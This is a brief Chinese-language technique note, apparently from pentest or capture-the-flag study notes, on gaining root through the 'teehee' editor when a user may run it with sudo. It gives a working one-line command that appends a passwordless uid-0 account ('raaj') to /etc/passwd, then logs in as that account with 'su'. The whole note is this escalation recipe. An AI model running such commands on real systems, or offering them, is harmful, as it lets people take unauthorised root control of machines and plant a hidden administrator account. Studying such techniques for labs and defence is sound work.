teehee 提权

teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

linux中普通用户能临时使用root权限的命令，查看方式：

sudo -l

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制，如果没有shadow条目，且passwd用户密码条目为空的时候，可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户，这个用户因为uid为0，所以也是root权限。